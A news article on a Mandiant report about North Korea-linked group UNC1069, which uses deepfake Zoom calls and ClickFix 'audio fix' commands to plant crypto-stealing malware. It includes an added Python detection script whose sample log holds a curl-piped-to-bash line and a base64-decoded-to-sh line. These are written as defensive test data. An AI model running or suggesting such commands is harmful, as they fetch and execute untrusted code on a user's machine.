North Korea-Linked Hackers Deploy New Crypto Malware
North Korean Hackers Unleash AI-Powered Crypto Heist: New Malware Strikes Fintech Firms
In a chilling escalation of cyber warfare, North Korean-linked threat actors have launched a sophisticated new wave of attacks targeting cryptocurrency and fintech companies, leveraging artificial intelligence to supercharge their social engineering campaigns and deploying a suite of advanced malware designed to exfiltrate sensitive data and drain digital wallets.
According to a Tuesday report by Mandiant, the cybersecurity arm of Google Cloud, a threat cluster tracked as UNC1069 has orchestrated a brazen campaign that combines cutting-edge AI deepfakes with seven unique malware families, marking a dangerous evolution in state-sponsored cybercrime.
The Anatomy of a High-Tech Heist
The attack begins with a meticulously crafted social engineering ploy. Threat actors compromise high-profile Telegram accounts—sometimes belonging to crypto founders themselves—and use them to lure victims into fake Zoom meetings. But here’s where it gets truly insidious: the attackers employ AI-generated deepfake videos to impersonate legitimate participants, complete with fabricated video feeds and claims of technical difficulties.
As Mandiant’s report details, victims are manipulated into running seemingly innocuous troubleshooting commands to “fix” audio issues during the meeting. Hidden within these commands is a malicious payload that triggers an infection chain, giving attackers a foothold in the victim’s system.
“This investigation revealed a tailored intrusion resulting in the deployment of seven unique malware families, including a new set of tooling designed to capture host and victim data: SILENCELIFT, DEEPBREATH, and CHROMEPUSH,” the report states.
Meet the New Malware Arsenal
Two of the newly discovered malware families—CHROMEPUSH and DEEPBREATH—are particularly alarming. These sophisticated data-mining viruses are engineered to bypass core operating system defenses, granting attackers deep access to personal data, credentials, and cryptocurrency wallets.
Mandiant notes that UNC1069 has been active since at least 2018, but the integration of AI tools has dramatically expanded their operational capacity. For the first time in November 2025, the group incorporated AI-enabled lures into active operations, signaling a new era of automated, large-scale social engineering.
Who’s in the Crosshairs?
The campaign primarily targets cryptocurrency firms, software developers, and venture capital companies—sectors rich in digital assets and intellectual property. A victimology map released by Mandiant shows a concentrated focus on Western-based crypto startups and blockchain infrastructure providers.
This isn’t an isolated incident. North Korean cyber operatives have long been a scourge on the crypto industry, with the Lazarus Group alone responsible for some of the largest heists in history, including the $1.4 billion Bybit hack earlier this year.
In June 2025, four North Korean operatives infiltrated multiple crypto firms posing as freelance developers, collectively stealing $900,000 from unsuspecting startups. The pattern is clear: these attackers are patient, persistent, and increasingly sophisticated.
The ClickFix Scam: Old Trick, New Tech
One of the attack vectors highlighted by Mandiant is a variant of the ClickFix scam, where victims are tricked into executing commands that appear to solve a technical problem but instead install malware. In this case, the scam is elevated by AI deepfakes, making the deception far more convincing.
The attacker, posing as a Zoom participant with audio issues, convinces the victim to run a command that silently executes the malware. From there, the infection chain unfolds, with tools like SILENCELIFT and CHROMEPUSH quietly siphoning data in the background.
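As an added detection example (not code from the article or from Mandiant's report), the following triage pass runs over constructed shell-execution log lines and flags the two ClickFix carriers described above: a remote fetch piped straight into a shell, and an encoded blob decoded into one. The log format, user names and URL are constructed for this example.

```python
import re
from typing import NamedTuple

class Event(NamedTuple):
    ts: str
    user: str
    parent: str
    cmd: str

# Remote content piped straight into a shell interpreter (curl/wget ... | sh).
FETCH_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")
# An encoded blob decoded and handed to a shell, hiding what the user pasted.
DECODE_TO_SHELL = re.compile(r"base64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")

RULES = [
    ("remote fetch piped to shell", FETCH_TO_SHELL),
    ("base64 decode piped to shell", DECODE_TO_SHELL),
]

# Constructed log format for this example: ts|user|parent_process|command
SAMPLE_LOG = [
    "2025-11-04T10:12:33Z|alice|zsh|ls -la ~/Downloads",
    "2025-11-04T10:13:01Z|alice|zsh|cat access.log | grep error | sort",
    "2025-11-04T10:14:09Z|alice|zsh|curl -fsSL https://example.invalid/audio-fix.sh | bash",
    "2025-11-04T10:14:40Z|bob|bash|echo aGVsbG8K | base64 -d | sh",
    "2025-11-04T10:15:02Z|bob|bash|curl -O https://example.invalid/notes.txt",
]

def parse(line: str) -> Event:
    """Split one log line; maxsplit keeps pipes inside the command intact."""
    ts, user, parent, cmd = line.split("|", 3)
    return Event(ts, user, parent, cmd)

def triage(lines):
    """Return (ts, user, reason) for each command matching a ClickFix heuristic.
    A command is reported once, under the first rule that matches."""
    hits = []
    for ev in map(parse, lines):
        for reason, rx in RULES:
            if rx.search(ev.cmd):
                hits.append((ev.ts, ev.user, reason))
                break
    return hits

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(*hit)
```

A download saved to disk without execution (the last sample line) is deliberately not flagged; the point of the rules is the pipe into an interpreter, which is what a pasted "audio fix" needs in order to run.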
A Growing Threat Landscape
The use of AI in cybercrime is no longer theoretical—it’s here, and it’s escalating. Mandiant’s findings underscore a troubling trend: state-sponsored actors are harnessing the power of generative AI to scale their operations, craft more convincing lures, and evade detection.
“The integration of AI tools has allowed UNC1069 to operate at a scale and sophistication previously unseen,” the report warns. “This is not just a technological arms race—it’s a battle for the future of digital finance.”
What This Means for the Crypto Industry
For cryptocurrency companies, the stakes couldn’t be higher. The combination of social engineering, AI deepfakes, and advanced malware creates a perfect storm of risk. Traditional security measures—like two-factor authentication and endpoint protection—are no longer sufficient against these multi-layered attacks.
Industry leaders are calling for a paradigm shift in cybersecurity strategy. This includes:
- Enhanced employee training to recognize AI-generated deepfakes and social engineering tactics.
- Zero-trust architectures that limit lateral movement within networks.
- AI-driven threat detection to identify anomalies in real time.
- Collaboration between crypto firms, cybersecurity vendors, and law enforcement to share threat intelligence.
The Global Implications
The rise of AI-powered cybercrime by state-sponsored actors like UNC1069 has geopolitical ramifications. North Korea has long used cybercrime to circumvent international sanctions and fund its regime. With AI, these operations can be conducted faster, cheaper, and at a larger scale.
“This is not just about stealing crypto—it’s about undermining the integrity of the entire digital economy,” said a cybersecurity analyst familiar with the Mandiant report. “If we don’t adapt, we risk losing the trust that underpins blockchain and decentralized finance.”
What’s Next?
Mandiant’s report is a wake-up call for the crypto industry and beyond. As AI tools become more accessible, the barrier to entry for sophisticated cyberattacks will continue to fall. The question is no longer if these attacks will happen, but how prepared we are to defend against them.
For now, UNC1069 remains active, and their tactics are evolving. The only certainty is that the battle between cybercriminals and defenders will only intensify—and the stakes have never been higher.